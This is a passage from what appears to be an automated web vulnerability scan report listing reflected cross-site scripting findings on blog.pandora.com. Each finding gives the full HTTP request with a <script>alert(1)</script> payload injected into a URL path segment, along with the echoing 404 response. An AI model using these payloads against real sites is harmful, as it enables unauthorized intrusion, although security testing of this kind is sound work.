Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...

1.96. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...

1.97. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...

1.98. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...

1.99. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...

1.100. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...

1.101. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...

1.102. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...

1.103. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p>
...[SNIP]...

1.104. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...

1.105. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...

1.106. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...

1.107. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...

1.108. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...

1.109. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...

1.110. http://blog.pandora.com/pandora/archives/2007/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...

1.111. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...

1.112. http://blog.pandora.com/pandora/archives/2007/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
